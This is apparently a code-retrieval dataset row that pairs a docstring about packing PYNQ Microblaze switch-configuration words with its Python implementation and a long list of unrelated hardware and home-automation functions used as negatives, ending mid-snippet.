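A minimal, self-contained sketch of the stop-via-reset behaviour captured by this row: stop() simply asserts reset on the soft processor, after which its reported state is "STOPPED". The stub class below is an assumption standing in for the real PYNQ Microblaze object; only the control flow is illustrated.

class _StubMicroblaze(object):
    def __init__(self):
        self.state = 'RUNNING'

    def reset(self):
        # Asserting reset halts instruction fetch on the soft core.
        self.state = 'STOPPED'


class Peripheral(object):
    def __init__(self):
        self.microblaze = _StubMicroblaze()

    def stop(self):
        # Put the Microblaze processor into reset.
        self.microblaze.reset()


p = Peripheral()
p.stop()
print(p.microblaze.state)  # prints: STOPPED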
Load the Microblaze processor's switch configuration. This method updates the switch configuration; each pin requires 8 bits for its configuration.
def load_switch_config(self, config=None): if config is None: config = ARDUINO_SWCFG_DIOALL elif not len(config) == 4*ARDUINO_SWITCHCONFIG_NUMREGS: raise TypeError('Invalid switch config {}.'.format(config)) # Build switch config word self.iop_switch_config = config sw_config_words = [0]*ARDUINO_SWITCHCONFIG_NUMREGS for ix, cfg in enumerate(self.iop_switch_config): if ix < 4: sw_config_words[0] |= (cfg << ix*8) elif ix < 8: sw_config_words[1] |= (cfg << (ix-4)*8) elif ix < 12: sw_config_words[2] |= (cfg << (ix-8)*4) elif ix < 16: sw_config_words[3] |= (cfg << (ix-12)*4) else: sw_config_words[4] |= (cfg << (ix-16)*4) # Configure switch for i in range(ARDUINO_SWITCHCONFIG_NUMREGS): self.write_cmd(ARDUINO_SWITCHCONFIG_BASEADDR + 4*i, sw_config_words[i])
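The packing loop above is easier to follow in isolation: four 8-bit pin configurations fill each of the first two 32-bit registers, while later pins fall back to 4-bit fields. A standalone sketch that mirrors the loop follows; the register count and pin widths are taken from the code above, not from any external API.

ARDUINO_SWITCHCONFIG_NUMREGS = 5  # assumed value for this sketch

def pack_switch_config(config):
    words = [0] * ARDUINO_SWITCHCONFIG_NUMREGS
    for ix, cfg in enumerate(config):
        if ix < 4:
            words[0] |= cfg << (ix * 8)
        elif ix < 8:
            words[1] |= cfg << ((ix - 4) * 8)
        elif ix < 12:
            words[2] |= cfg << ((ix - 8) * 4)
        elif ix < 16:
            words[3] |= cfg << ((ix - 12) * 4)
        else:
            words[4] |= cfg << ((ix - 16) * 4)
    return words

# Four pins configured as 0x01 each pack into the first register:
print([hex(w) for w in pack_switch_config([0x01] * 4)])
# ['0x1010101', '0x0', '0x0', '0x0', '0x0']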
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def configure_switch(self, number: str, config: SwitchConfig, platform_config: dict) -> \"SwitchPlatformInterface\":\n raise NotImplementedError", "def configure_switch(self, config):\n raise NotImplementedError", "def __init__(self, mb_info, switch_config):\n self.microblaze = Arduino(mb_info, ARDUINO_MAILBOX_PROGRAM)\n self.iop_switch_config = switch_config", "def initialize(self):\n self.log.info(\"Initialize raspPinball hardware.\")\n\n self.config = self.machine.config['rasppinball']\n self.machine.config_validator.validate_config(\"rasppinball\", self.config)\n print(\"***************************\")\n print(self.config)\n #self.machine_type = (\n # self.machine.config['hardware']['driverboards'].lower())\n\n self._connect_to_hardware()\n\n\n # keypad\n self._kp = Keypad()\n self.old_key = \"\"\n self.key = \"\"\n # leds\n self.init_strips()", "def GPIO_initialization():\n GPIO.setmode(GPIO.BCM)\n\n GPIO.setup(Sensor.IN_1, GPIO.OUT)\n GPIO.setup(Sensor.IN_2, GPIO.OUT)\n GPIO.setup(Sensor.EN, GPIO.OUT)\n\n GPIO.setup(Membrane_Switch.PSEUDO_MEMBRANE_SWITCH['RED_STOP'], GPIO.IN)\n GPIO.setup(Membrane_Switch.PSEUDO_MEMBRANE_SWITCH['YELLOW_CW'], GPIO.IN)\n GPIO.setup(Membrane_Switch.PSEUDO_MEMBRANE_SWITCH['GREEN_CCW'], GPIO.IN)\n\n GPIO.output(Sensor.IN_1, GPIO.LOW)\n GPIO.output(Sensor.IN_2, GPIO.LOW)", "def _use_existing_configuration(self):\n HW_Init(self.ftdi, None)", "def load_switches(self):\n new_switches = list()\n for site in self.sites:\n switches = self.get_switches_stats(site_id=site['id'])\n for switch in switches:\n if len(switch['name']) < 1:\n switch['name'] = ':'.join([switch['mac'][i:i + 2].upper() for i in range(0, len(switch['mac']), 2)])\n new_switch = {\n \"name\": switch['name'],\n \"site\": site['name'],\n \"site_id\": site['id'],\n \"device_id\": switch['id'],\n \"mac\": switch['mac'],\n \"mac_str\": ':'.join([switch['mac'][i:i + 2].upper() for i in range(0, len(switch['mac']), 2)]),\n \"ip_config\": switch['ip_config'],\n \"ip_actual\": switch['ip_stat'],\n \"net_obj\": get_network(address=switch['ip_config']['ip'], netmask=switch['ip_config']['netmask']) if 'ip' in switch['ip_config'] else None\n }\n for vlan, addr in new_switch['ip_actual']['ips'].items():\n if new_switch['ip_actual']['ip'] == addr:\n new_switch['ip_actual']['vlan'] = vlan.strip('vlan')\n else:\n new_switch['ip_actual']['vlan'] = 0\n if new_switch['ip_config']['network'] and new_switch['ip_config']['network'] != \"default\":\n new_switch['ip_config']['vlan'] = site['network_template']['networks'][new_switch['ip_config']['network']]['vlan_id']\n logger.debug(f\"Matched {new_switch['name']} management network '{new_switch['ip_config']['network']}' to VLAN {new_switch['ip_config']['vlan']}\")\n elif new_switch['ip_config']['network'] and new_switch['ip_config']['network'] == \"default\":\n new_switch['ip_config']['vlan'] = 1\n logger.debug(f\"Matched {new_switch['name']} management network '{new_switch['ip_config']['network']}' to VLAN {new_switch['ip_config']['vlan']}\")\n else:\n new_switch['ip_config']['vlan'] = 0\n logger.error(f\"Did not match {new_switch['name']} management network '{new_switch['ip_config']['network']}' to VLAN {new_switch['ip_config']['vlan']}\")\n new_switches.append(new_switch)\n self.switches = new_switches", "def configure_light(self, number: str, subtype: str, config: LightConfig,\n platform_settings: dict) -> \"LightPlatformInterface\":\n raise NotImplementedError", "def setupHw():\n\n pin.setupHw()\n pin.setupOutPins(traffic_lights)\n pin.setDebug(False)", "def 
start(self):\n self.microblaze.run()\n self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_CMD_OFFSET, 0)\n self.load_switch_config(self.iop_switch_config)", "def __init__(self):\n GPIO.setwarnings(False)\n GPIO.cleanup() # Reset the high and low levels of the GPIO port\n #The following code defines the GPIO used to control the L298N chip. This definition is different for different Raspberry Pi driver boards.\n self.Motor_A_EN = 17\n self.Motor_B_EN = 4\n self.Motor_A_Pin1 = 27\n self.Motor_A_Pin2 = 18\n self.Motor_B_Pin1 = 21\n self.Motor_B_Pin2 = 26\n self.setup()", "def set_config(self): # called from button_set object \n self.settings['lights_on'] = self.lights_on.get()\n self.settings['lights_off'] = self.lights_off.get()\n self.settings['ambient_min'] = self.ambient_min.get()\n self.settings['soil_1'] = self.smc1.get()\n self.settings['soil_2'] = self.smc2.get()\n self.settings['soil_3'] = self.smc3.get()\n self.settings['soil_4'] = self.smc4.get()\n self.settings['overhead_level'] = self.overhead_level.get()\n\n # Save settings to config file in case of reboot / power-loss\n print \"UPDATING SETTINGS FILE\"\n with open(self.settings_path, 'w') as jsonfile:\n jsonfile.write(json.dumps(self.settings, indent=4))\n self.active_changes = True # (flag) changes are active!", "def state(config: dict):\n\n async def state_callback(device):\n if device.basic_info is not None:\n if device.available:\n print_device_details(device)\n\n device.shutdown_event_loop()\n\n logger.info(\"Initialising SonoffSwitch with host %s\" % config[\"host\"])\n SonoffSwitch(\n host=config[\"host\"],\n callback_after_update=state_callback,\n logger=logger,\n device_id=config[\"device_id\"],\n api_key=config[\"api_key\"],\n )", "def switch_changed(self, switch, name):\n section, option = name\n v = (\"1\" if switch.value else \"0\")\n _stash.config.set(section, option, v)\n self.save()", "def setup_platform(hass, config, add_devices, discovery_info=None):\n devices = config.get(CONF_SWITCHES, {})\n cmdrgbwlight = []\n\n for object_id, device_config in devices.items():\n value_template = device_config.get(CONF_STATE_VALUE_TEMPLATE)\n\n if value_template is not None:\n value_template.hass = hass\n\n cmdrgbwlight.append(\n CommandSwitch(\n hass,\n object_id,\n device_config.get(CONF_NAME),\n device_config.get(CONF_COMMAND_ON),\n device_config.get(CONF_COMMAND_OFF),\n device_config.get(CONF_COMMAND_STATE),\n device.config.get(CONF_BRIGHTNESS_STATE),\n device.config.get(CONF_BRIGHTNESS_COMMAND),\n device.config.get(CONF_BRIGHTNESS_VALUE_TEMPLATE),\n device.config.get(CONF_RGB_STATE),\n device.config.get(CONF_RGB_COMMAND),\n device.config.get(CONF_RGB_VALUE_TEMPLATE),\n device.config.get(CONF_FRIENDLY_NAME, object_id),\n device.config.get(CONF_BRIGHTNESS_SCALE),\n value_template\n )\n )\n\n if not cmdrgbwlight:\n _LOGGER.error(\"No switches added\")\n return False\n\n add_devices(cmdrgbwlight)", "def load(self):\n basePath = './examples/'\n file = \"print8.ls8\"\n # file = \"mult.ls8\"\n # file = \"stack.ls8\"\n # file = \"call.ls8\"\n file = \"sctest.ls8\"\n if len(sys.argv) > 1:\n file = sys.argv[1]\n address = 0\n\n with open(basePath + file, \"r\") as f:\n for line in f:\n line = line.split(\"#\")\n\n try:\n v = int(line[0], 2)\n except ValueError:\n continue\n # print(v)\n self.ram[address] = v\n address += 1", "def setup(self):\n self.log.debug('RFSwitch - in RFSwitch setup()')\n # Add resource setup code here\n print(\"Calling RFSwitch:setup\")", "def setup_platform(hass, config, add_devices, 
discovery_info=None):\n cl = hass.data.get(DATA_CIRCADIAN_LIGHTING)\n if cl:\n cs = CircadianSwitch(\n hass,\n cl,\n name=config.get(CONF_NAME),\n lights_ct=config.get(CONF_LIGHTS_CT, []),\n lights_rgb=config.get(CONF_LIGHTS_RGB, []),\n lights_xy=config.get(CONF_LIGHTS_XY, []),\n lights_brightness=config.get(CONF_LIGHTS_BRIGHT, []),\n disable_brightness_adjust=config.get(CONF_DISABLE_BRIGHTNESS_ADJUST),\n min_brightness=config.get(CONF_MIN_BRIGHT),\n max_brightness=config.get(CONF_MAX_BRIGHT),\n sleep_entity=config.get(CONF_SLEEP_ENTITY),\n sleep_state=config.get(CONF_SLEEP_STATE),\n sleep_colortemp=config.get(CONF_SLEEP_CT),\n sleep_brightness=config.get(CONF_SLEEP_BRIGHT),\n disable_entity=config.get(CONF_DISABLE_ENTITY),\n disable_state=config.get(CONF_DISABLE_STATE),\n initial_transition=config.get(CONF_INITIAL_TRANSITION),\n )\n add_devices([cs])\n\n def update(call=None):\n \"\"\"Update lights.\"\"\"\n cs.update_switch()\n\n return True\n else:\n return False", "def _configure(self) -> None:\n reg_data = self.configuration\n conf_data = reg_data & ~0xC0 | 0x80\n # check if already in the right configuration, do not re-configure on and on again\n if reg_data != conf_data:\n self.configuration = conf_data", "def load(self):\n super().load()\n for channel in range(self.n_channels):\n c_str = 'Channel_{0:02d}'.format(channel)\n if c_str not in self:\n log.info(f'{c_str} not found in config yaml, adding it now with defaults')\n self.set(c_str, {'amplitude': 1.5, 'dc_offset': 0.0}, save_config=True)\n\n val = self.get(c_str)\n self.amplitude(channel, val['amplitude'])\n self.offset(channel, val['dc_offset'])\n self._set_register(0, self.get('clock_delay', 1000)//100 + self._seq_length//100 - 1)", "async def async_setup_entry(\n hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback\n) -> None:\n\n bhyve = hass.data[DOMAIN][entry.entry_id][CONF_CLIENT]\n\n switches = []\n devices = filter_configured_devices(entry, await bhyve.devices)\n programs = await bhyve.timer_programs\n\n device_by_id = {}\n\n for device in devices:\n device_id = device.get(\"id\")\n device_by_id[device_id] = device\n if device.get(\"type\") == DEVICE_SPRINKLER:\n if not device.get(\"status\"):\n _LOGGER.warning(\n \"Unable to configure device %s: the 'status' attribute is missing. 
Has it been paired with the wifi hub?\",\n device.get(\"name\"),\n )\n continue\n\n # Filter out any programs which are not for this device\n device_programs = [\n program for program in programs if program.get(\"device_id\") == device_id\n ]\n\n switches.append(\n BHyveRainDelaySwitch(hass, bhyve, device, \"weather-pouring\")\n )\n\n all_zones = device.get(\"zones\")\n for zone in all_zones:\n zone_name = zone.get(\"name\")\n # if the zone doesn't have a name, set it to the device's name if there is only one (eg a hose timer)\n if zone_name is None:\n zone_name = (\n device.get(\"name\") if len(all_zones) == 1 else \"Unnamed Zone\"\n )\n switches.append(\n BHyveZoneSwitch(\n hass,\n bhyve,\n device,\n zone,\n zone_name,\n device_programs,\n \"water-pump\",\n )\n )\n\n for program in programs:\n program_device = device_by_id.get(program.get(\"device_id\"))\n program_id = program.get(\"program\")\n if program_device is not None and program_id is not None:\n _LOGGER.info(\"Creating switch: Program %s\", program.get(\"name\"))\n switches.append(\n BHyveProgramSwitch(\n hass, bhyve, program_device, program, \"bulletin-board\"\n )\n )\n\n async_add_entities(switches, True)\n\n async def async_service_handler(service):\n \"\"\"Map services to method of BHyve devices.\"\"\"\n _LOGGER.info(\"%s service called\", service.service)\n method = SERVICE_TO_METHOD.get(service.service)\n if not method:\n _LOGGER.warning(\"Unknown service method %s\", service.service)\n return\n\n params = {\n key: value for key, value in service.data.items() if key != ATTR_ENTITY_ID\n }\n entity_ids = service.data.get(ATTR_ENTITY_ID)\n component = hass.data.get(SWITCH_DOMAIN)\n if entity_ids:\n target_switches = [component.get_entity(entity) for entity in entity_ids]\n else:\n return\n\n method_name = method[\"method\"]\n _LOGGER.debug(\"Service handler: %s %s\", method_name, params)\n\n for entity in target_switches:\n if not hasattr(entity, method_name):\n _LOGGER.error(\"Service not implemented: %s\", method_name)\n return\n await getattr(entity, method_name)(**params)\n\n for service, details in SERVICE_TO_METHOD.items():\n schema = details[\"schema\"]\n hass.services.async_register(\n DOMAIN, service, async_service_handler, schema=schema\n )", "def set_switch(self, node_uuid, index, data):\n if data == \"on\":\n self._bus.i2c_acquire()\n try:\n p = self.values['num'].get_data_index(index=index)\n self._bus.pca9685_manager.set_pwm(p, 4096, 0)\n self.values['level'].set_data_index(index=index, data=100)\n except Exception:\n logger.exception('[%s] - Exception when switching on', self.__class__.__name__)\n finally:\n self._bus.i2c_release()\n elif data == \"off\":\n self._bus.i2c_acquire()\n try:\n p = self.values['num'].get_data_index(index=index)\n self._bus.pca9685_manager.set_pwm(p, 0, 4096)\n self.values['level'].set_data_index(index=index, data=0)\n except Exception:\n logger.exception('[%s] - Exception when switching off', self.__class__.__name__)\n finally:\n self._bus.i2c_release()\n else:\n logger.warning(\"[%s] - set_switch unknown data : %s\", self.__class__.__name__, data)", "def t0_switch_config_helper(test_obj: 'T0TestBase'):\n configer = SwitchConfiger(test_obj)\n test_obj.dut.switch_id = configer.start_switch()", "def connect_to_switches(self):\n for p4switch in self.topo.get_p4switches():\n thrift_port = self.topo.get_thrift_port(p4switch)\n self.controllers[p4switch] = SimpleSwitchThriftAPI(thrift_port)", "def setup_platform(hass, config, add_devices, discovery_info=None):\n switches = []\n for coil 
in config.get(\"coils\"):\n switches.append(ModbusCoilSwitch(\n coil.get(CONF_NAME),\n coil.get(CONF_SLAVE),\n coil.get(CONF_COIL)))\n add_devices(switches)", "def config_led(my_bus):\n try:\n my_bus.write_i2c_block_data(LED_DEVICE_ADDRESS, 0x2F, [0xFF]) # system setup\n my_bus.write_i2c_block_data(LED_DEVICE_ADDRESS, 0x89, [0xFF]) # display on\n except IOError:\n t = 1\n print(\"got IOError. try again in\", t, \"second\")\n time.sleep(t)", "def initialize(self):\n\t\tpcd8544.LCD.initialize(self)\n\t\tRPIO.setup(self._backlight_pin, RPIO.OUT, initial=RPIO.LOW)", "def setup(self):\n\t\tself.interface = self.getDriver('light_interface')\n\n\t\tself.pin = self.config['interface_position']\n\t\tself.blink_rate = self.config['blink_rate'] / 2 or 0.5\n\t\tself.is_on = False\n\n\t\tself.intensity = 255\n\t\tself.blink = False\n\t\tself.count = None\n\t\tself.current_count = False\n\t\tself.current_count = None\n\n\t\tself.saved_intensity = None\n\t\tself.saved_blink = False\n\t\tself.saved_count = None\n\n\t\treturn True", "def _initialize_hardware(self):\n # Import\n try:\n from gpiozero import MCP3008\n except Exception as ex:\n logging.error('\\n *** ERROR importing gpiozero: {}'.format(ex))\n\n # Things failed, must be running locally, not on a widget, so don't\n # bother initializing the MCP3008\n return\n\n # Initialize the MCP3008\n try:\n self._sensor = MCP3008(channel=0)\n except Exception as ex:\n logging.error('\\n *** ERROR initializing MCP3008: {}'.format(ex))\n return\n\n # Start force loop thread\n threading.Thread(target=self._force_loop, daemon=True).start()", "def set_new_config(modem, disable_auto_linking, monitor_mode, auto_led, deadman):\n modem.configuration[DISABLE_AUTO_LINKING].new_value = disable_auto_linking\n modem.configuration[MONITOR_MODE].new_value = monitor_mode\n modem.configuration[AUTO_LED].new_value = auto_led\n modem.configuration[DEADMAN].new_value = deadman", "def pibooth_configure(cfg):", "def __init__(\n self,\n hass,\n cl,\n name,\n lights_ct,\n lights_rgb,\n lights_xy,\n lights_brightness,\n disable_brightness_adjust,\n min_brightness,\n max_brightness,\n sleep_entity,\n sleep_state,\n sleep_colortemp,\n sleep_brightness,\n disable_entity,\n disable_state,\n initial_transition,\n ):\n self.hass = hass\n self._cl = cl\n self._name = name\n self._entity_id = \"switch.\" + slugify(f\"circadian_lighting {name}\")\n self._state = None\n self._icon = ICON\n self._hs_color = None\n self._lights_ct = lights_ct\n self._lights_rgb = lights_rgb\n self._lights_xy = lights_xy\n self._lights_brightness = lights_brightness\n self._disable_brightness_adjust = disable_brightness_adjust\n self._min_brightness = min_brightness\n self._max_brightness = max_brightness\n self._sleep_entity = sleep_entity\n self._sleep_state = sleep_state\n self._sleep_colortemp = sleep_colortemp\n self._sleep_brightness = sleep_brightness\n self._disable_entity = disable_entity\n self._disable_state = disable_state\n self._initial_transition = initial_transition\n self._attributes = {\"hs_color\": self._hs_color, \"brightness\": None}\n\n self._lights = lights_ct + lights_rgb + lights_xy + lights_brightness\n\n # Register callbacks\n dispatcher_connect(hass, CIRCADIAN_LIGHTING_UPDATE_TOPIC, self.update_switch)\n track_state_change(hass, self._lights, self.light_state_changed)\n if self._sleep_entity is not None:\n track_state_change(hass, self._sleep_entity, self.sleep_state_changed)\n if self._disable_entity is not None:\n track_state_change(hass, self._disable_entity, 
self.disable_state_changed)", "def update_preprocessing_gmwmi(self, new):\n self.stages[\"Preprocessing\"].config.gmwmi_seeding = new\n self.stages[\"Registration\"].config.gmwmi_seeding = new", "def _get_switch(self, switch):\n switch = self.switch_by_label(switch)\n id = self.switches[switch.label].id\n # make sure that the serial port is open\n self.assure_serial()\n # create command for the arduino and send it\n input_string = 'r' + str(id[0]) + str(id[1])\n self.serial.write(input_string.encode('ascii'))\n time.sleep(self.READ_DELAY)\n # retrieve result\n result = self.serial.readline().decode().rstrip()\n time.sleep(self.READ_DELAY)\n # store the indicators to the switch\n switch.indicators = (int(result[0]), int(result[1]))\n # raise error if the indicators show an error\n if switch.state is None:\n raise SwitchError(\"Reading the state was unsuccessful: Indicators \"\n f\"of the switch show {switch.indicators}.\")\n return switch.state", "def setup_platform(hass, config, add_devices, discovery_info=None):\n name = config.get(CONF_NAME)\n mac = config.get(CONF_MAC)\n pin = config.get(CONF_PIN)\n\n add_devices([ProgtimeSwitch(mac, pin, name)])", "def set_bootloader_mode(self, mode):\n self.check_validity()\n\n mode = int(mode)\n\n return self.ipcon.send_request(self, BrickletIndustrialDualAnalogInV2.FUNCTION_SET_BOOTLOADER_MODE, (mode,), 'B', 9, 'B')", "def software_load(self, filename: str) -> None:\n pass # Most boards can use serialboot.", "def setup():\n GPIO.setmode(GPIO.BCM)\n for pin in [config.gpio_pin_p1_stretch,\n config.gpio_pin_p1_serve,\n config.gpio_pin_p2_stretch,\n config.gpio_pin_p2_serve]:\n GPIO.setup(pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\n input_reader_thread = threading.Thread(target=input_reader_worker)\n input_reader_thread.setDaemon(True)\n input_reader_thread.start()", "def wirebomb_config_load(self, filepath):\n scene = self.set_as_active()\n\n config = configparser.ConfigParser()\n config.read(filepath)\n\n if 'WIREFRAME TYPE' in config and 'wireframe_method' in config['WIREFRAME TYPE']:\n scene.wirebomb.wireframe_method = config['WIREFRAME TYPE']['wireframe_method']\n\n if 'CHECKBOXES' in config:\n if 'cb_backup' in config['CHECKBOXES']:\n scene.wirebomb.cb_backup = eval(config['CHECKBOXES']['cb_backup'])\n\n if 'cb_clear_rlayers' in config['CHECKBOXES']:\n scene.wirebomb.cb_clear_rlayers = eval(config['CHECKBOXES']['cb_clear_rlayers'])\n\n if 'cb_clear_materials' in config['CHECKBOXES']:\n scene.wirebomb.cb_clear_materials = eval(config['CHECKBOXES']['cb_clear_materials'])\n\n if 'cb_composited' in config['CHECKBOXES']:\n scene.wirebomb.cb_composited = eval(config['CHECKBOXES']['cb_composited'])\n\n if 'cb_only_selected' in config['CHECKBOXES']:\n scene.wirebomb.cb_only_selected = eval(config['CHECKBOXES']['cb_only_selected'])\n\n if 'cb_ao' in config['CHECKBOXES']:\n scene.wirebomb.cb_ao = eval(config['CHECKBOXES']['cb_ao'])\n\n if 'cb_clay' in config['CHECKBOXES']:\n scene.wirebomb.cb_clay = eval(config['CHECKBOXES']['cb_clay'])\n\n if 'cb_clay_only' in config['CHECKBOXES']:\n scene.wirebomb.cb_clay_only = eval(config['CHECKBOXES']['cb_clay_only'])\n\n if 'cb_mat_wire' in config['CHECKBOXES']:\n scene.wirebomb.cb_mat_wire = eval(config['CHECKBOXES']['cb_mat_wire'])\n\n if 'cb_mat_clay' in config['CHECKBOXES']:\n scene.wirebomb.cb_mat_clay = eval(config['CHECKBOXES']['cb_mat_clay'])\n\n if 'COLORS SET' in config:\n if 'color_wireframe' in config['COLORS SET']:\n scene.wirebomb.color_wire = eval(config['COLORS SET']['color_wireframe'])\n\n if 
'color_clay' in config['COLORS SET']:\n scene.wirebomb.color_clay = eval(config['COLORS SET']['color_clay'])\n\n if 'MATERIALS SET' in config:\n if 'wireframe' in config['MATERIALS SET']:\n if config['MATERIALS SET']['wireframe'] in bpy.data.materials:\n scene.wirebomb.material_wire = config['MATERIALS SET']['wireframe']\n\n if 'clay' in config['MATERIALS SET']:\n if config['MATERIALS SET']['clay'] in bpy.data.materials:\n scene.wirebomb.material_clay = config['MATERIALS SET']['clay']\n\n if 'SLIDERS' in config:\n if 'slider_wt_freestyle' in config['SLIDERS']:\n scene.wirebomb.slider_wt_freestyle = eval(config['SLIDERS']['slider_wt_freestyle'])\n\n if 'slider_wt_modifier' in config['SLIDERS']:\n scene.wirebomb.slider_wt_modifier = eval(config['SLIDERS']['slider_wt_modifier'])\n\n if 'LAYERS SELECTED' in config:\n if 'layers_affected' in config['LAYERS SELECTED']:\n scene.wirebomb.layers_affected = eval(config['LAYERS SELECTED']['layers_affected'])\n\n if 'layers_other' in config['LAYERS SELECTED']:\n scene.wirebomb.layers_other = eval(config['LAYERS SELECTED']['layers_other'])\n\n if 'SCENE NAME SET' in config:\n if 'scene_name_1' in config['SCENE NAME SET']:\n scene.wirebomb.scene_name_1 = config['SCENE NAME SET']['scene_name_1']", "def setup_platform(hass, config, add_devices_callback, discovery_info=None):\n host = config.get(CONF_HOST)\n name = config.get(CONF_NAME)\n token = config.get('token')\n\n add_devices_callback([MiroboSwitch(name, host, token)])", "def save_switch_configs(self):", "def platform_config_update(config):\n global remote_port_map\n config[\"port_map\"] = remote_port_map.copy()\n config[\"caps_table_idx\"] = 0", "def load(self, identifier):\n if identifier == \"PIPISTRELLO_DEFAULT\":\n get_pipistrello_default(self)\n self.print_log(1, \"LOADED DEFAULT PIPISTRELLO\")\n else:\n raise NameError(\"Desired setup not found in load() or devices.py: \" + identifier)", "def init(self):\n self.reset()\n\n self.__interface.send_command('POWER_SETTING')\n self.__interface.send_data(0x37)\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('PANEL_SETTING')\n self.__interface.send_data(0xCF)\n self.__interface.send_data(0x08)\n\n self.__interface.send_command('BOOSTER_SOFT_START')\n self.__interface.send_data(0xc7)\n self.__interface.send_data(0xcc)\n self.__interface.send_data(0x28)\n\n self.__interface.send_command('POWER_ON')\n self.wait_until_idle()\n\n self.__interface.send_command('PLL_CONTROL')\n self.__interface.send_data(0x3c)\n\n self.__interface.send_command('TEMPERATURE_CALIBRATION')\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('VCOM_AND_DATA_INTERVAL_SETTING')\n self.__interface.send_data(0x77)\n\n self.__interface.send_command('TCON_SETTING')\n self.__interface.send_data(0x22)\n\n self.__interface.send_command('TCON_RESOLUTION')\n self.__interface.send_data(0x02) #source 640\n self.__interface.send_data(0x80)\n self.__interface.send_data(0x01) #gate 384\n self.__interface.send_data(0x80)\n\n self.__interface.send_command('VCM_DC_SETTING')\n self.__interface.send_data(0x1E) #decide by LUT file\n\n self.__interface.send_command(0xe5, False) #FLASH MODE\n self.__interface.send_data(0x03)", "def configure(self, filename):\n print('configuring fpga with %s' % filename)\n bitfile.load(filename, self.smap)", "async def async_setup_entry(\n hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback\n) -> None:\n platform = entity_platform.async_get_current_platform()\n\n for service_name, schema, method in (\n 
(\"start_program\", {}, \"async_start_program\"),\n (\n \"start_zone\",\n {\n vol.Optional(\n CONF_DEFAULT_ZONE_RUN_TIME, default=DEFAULT_ZONE_RUN\n ): cv.positive_int\n },\n \"async_start_zone\",\n ),\n (\"stop_program\", {}, \"async_stop_program\"),\n (\"stop_zone\", {}, \"async_stop_zone\"),\n ):\n platform.async_register_entity_service(service_name, schema, method)\n\n data: RainMachineData = hass.data[DOMAIN][entry.entry_id]\n entities: list[RainMachineBaseSwitch] = []\n\n for kind, api_category, switch_class, switch_enabled_class in (\n (\"program\", DATA_PROGRAMS, RainMachineProgram, RainMachineProgramEnabled),\n (\"zone\", DATA_ZONES, RainMachineZone, RainMachineZoneEnabled),\n ):\n coordinator = data.coordinators[api_category]\n for uid, activity in coordinator.data.items():\n name = activity[\"name\"].capitalize()\n\n # Add a switch to start/stop the program or zone:\n entities.append(\n switch_class(\n entry,\n data,\n RainMachineActivitySwitchDescription(\n key=f\"{kind}_{uid}\",\n name=name,\n api_category=api_category,\n uid=uid,\n ),\n )\n )\n\n # Add a switch to enabled/disable the program or zone:\n entities.append(\n switch_enabled_class(\n entry,\n data,\n RainMachineActivitySwitchDescription(\n key=f\"{kind}_{uid}_enabled\",\n name=f\"{name} enabled\",\n api_category=api_category,\n uid=uid,\n ),\n )\n )\n\n # Add switches to control restrictions:\n for description in RESTRICTIONS_SWITCH_DESCRIPTIONS:\n coordinator = data.coordinators[description.api_category]\n if not key_exists(coordinator.data, description.data_key):\n continue\n entities.append(RainMachineRestrictionSwitch(entry, data, description))\n\n async_add_entities(entities)", "def _load_shift_register(ser_pin, srclk_pin, rclk_pin, binary_inputs):\n # type: (int, int, int, Iterable[bool]) -> None\n if logger.isEnabledFor(logging.DEBUG):\n # The binary_inputs may be a generator, so save all the binary_inputs\n # into a list so they can be iterated over more than once.\n binary_inputs = list(binary_inputs)\n logger.debug(\"Loading shift register using pins (SER: %s, SRCLK: %s, \"\n \"RCLK: %s) with the following values: %s\",\n ser_pin, srclk_pin, rclk_pin, binary_inputs)\n\n # Use each element in the list as binary data output\n for output_bit in binary_inputs:\n GPIO.output(ser_pin, output_bit)\n _pin_pulse(srclk_pin)\n\n # Data has been loaded, trigger the output of data\n _pin_pulse(rclk_pin)\n # This is not in a try finally so that partially loaded data is never\n # displayed", "def setup(self):\n \n # Board refers to the P1 header of the Raspberry Pi board\n GPIO.setmode(GPIO.BOARD)\n\n # Set up pin as an input with a pull up resistor to 3.3V\n GPIO.setup(self.__pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)", "def _on_config_changed(self, _):\n self._configure_pod()", "def set_bootloader_mode(self, mode):\n mode = int(mode)\n\n return self.ipcon.send_request(self, BrickletBarometerV2.FUNCTION_SET_BOOTLOADER_MODE, (mode,), 'B', 'B')", "def load(self):\n\n # address = 0\n\n # # For now, we've just hardcoded a program:\n\n # program = [\n # # From print8.ls8\n # 0b10000010, # LDI R0,8\n # 0b00000000,\n # 0b00001000,\n # 0b01000111, # PRN R0\n # 0b00000000,\n # 0b00000001, # HLT\n # ]\n\n # for instruction in program:\n # self.ram[address] = instruction\n # address += 1\n\n if len(sys.argv) != 2:\n print(\"usage: python3 ls8.py examples/filename\")\n sys.exit(1)\n\n try:\n address = 0\n\n with open(sys.argv[1]) as f:\n for line in f:\n t = line.split('#')\n n = t[0].strip()\n\n if n == '':\n continue\n\n try:\n n = 
int(n, 2)\n except ValueError:\n print(f\"Invalid number '{n}'\")\n sys.exit(1)\n\n self.ram[address] = n\n address += 1\n\n except FileNotFoundError:\n print(f\"File not found: {sys.argv[1]}\")\n sys.exit(2)", "def boot_config():\n # quick check to grab a config file from /boot partition.\n # this function helps users who cannot SSH/access the Pi,\n # but can access the microSD card\n if os.path.exists(BOOT_CONFIG_PATH):\n print(\"Configuration loaded from /boot directory.\")\n with open(BOOT_CONFIG_PATH) as boot_file:\n with open(CONFIG_FILE_PATH, 'w+') as config_file:\n for line in boot_file:\n config_file.write(line)", "def update(self):\n\n if len(self._data) > 0:\n if not self._switch._is_on:\n tmp = list(self._data.keys())\n\n random.shuffle(tmp)\n\n data = random.sample(tmp,1)[0]\n\n if (self._state == data):\n random.shuffle(tmp)\n random.shuffle(tmp)\n data = random.sample(tmp, 1)[0]\n\n self._state = self._data[data]\n \n self._now_key = data\n self._now_val = self._data[data]\n\n return\n\n self._api.load_file()\n\n self._data = self._api._data\n\n tmp = list(self._data.keys())\n\n random.shuffle(tmp)\n data = random.sample(tmp,1)[0]\n\n if (self._state == data):\n random.shuffle(tmp)\n random.shuffle(tmp)\n data = random.sample(tmp,1)[0]\n\n self._state = self._data[data]\n \n self._now_key = data\n self._now_val = self._data[data]", "async def initialize(self, 